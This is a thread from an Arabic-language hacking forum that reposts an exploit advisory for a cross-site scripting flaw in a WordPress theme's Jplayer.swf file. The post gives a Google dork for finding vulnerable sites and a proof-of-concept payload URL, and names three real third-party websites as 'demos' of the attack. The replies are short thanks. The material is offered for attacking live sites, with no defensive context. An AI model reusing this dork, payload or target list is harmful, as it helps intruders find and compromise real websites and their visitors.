1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Ubuntu | المشاهدات : 634 | الردود : 2
حالة الموضوع:
مغلق
  1. Ubuntu Developer

    الأنتساب:
    ‏6 يناير 2013
    المشاركات:
    62
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    نظام التشغيل:
    Linux
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله تعالى وبركاته

    كود PHP:
    X-------------------------------------------------------------X
     _____ _   _ _   _ _____ _____ _____  ___   _   _   _______   _______ ___________ 
    |_   _| | | | \ | |_   _/  ___|_   _|/ \ | \ | | /  __ \ \ / / ___ \  ______ \
      | | | | | |  \| | | | \ `
    --.  | | / /_\ \|  \| | | /  \/\ V /| |_/ / |__ | |_/ /
      | | | | | | . 
    ` | | |  `--. \ | | |  _  || . ` | | |     \ / | ___ \  __||    / 
      | | | |
    _| | |\  |_| |_/\__/ /_| |_| | | || |\  | | \__/\ | | | |_/ / |___| |\ \ 
      \
    _/  \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/  \____/ \_/ \____/\____/\_| \_|
    X-------------------------------------------------------------X                                                                                  
     
     
    ***91;+***93AuthorTUNISIAN CYBER
    ***91;+***93Exploit Title:  WordPress hipster (jplayer.swfCross Site Scripting vulnerability
    ***91;+***93Date4-12-2013
    ***91;+***93CategoryWebApp
    ***91;+***93Google Dorkinurl:"/wp-content/themes/moustachey"
    ***91;+***93Tested onWin7 ubuntu 13.04
     
     
    ########################################################################################

    Proof:

    http//127.0.0.1/***91;Path***93;/wp-content/themes/hipster/assets/javascripts/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day%20TUNISIAN%20CYBER/)//

     
    Demos:
    http://www.oletimey.com/wp-content/themes/hipster/assets/javascripts/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day%20TUNISIAN%20CYBER/)//
    http://brisbanefringe.com/wp-content/themes/hipster/assets/javascripts/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day%20TUNISIAN%20CYBER/)//
    http://www.joeposa.com/wp-content/themes/hipster/assets/javascripts/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!*****(/1337day%20TUNISIAN%20CYBER/)//

    the rest google

    ./3nD
    ########################################################################################
     
  2. الراسي Developer

    الأنتساب:
    ‏18 ديسمبر 2011
    المشاركات:
    12
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    في بلاد الكرم
    نظام التشغيل:
    Linux
    رد: WordPress hipster (jplayer.swf) Cross Site Scripting vulnerabilit

    يعطيك العافية ياغالي !$^@​
     
  3. NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    PHP
    رد: WordPress hipster (jplayer.swf) Cross Site Scripting vulnerabilit

    :{4}::{4}::{4}: مشكور
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة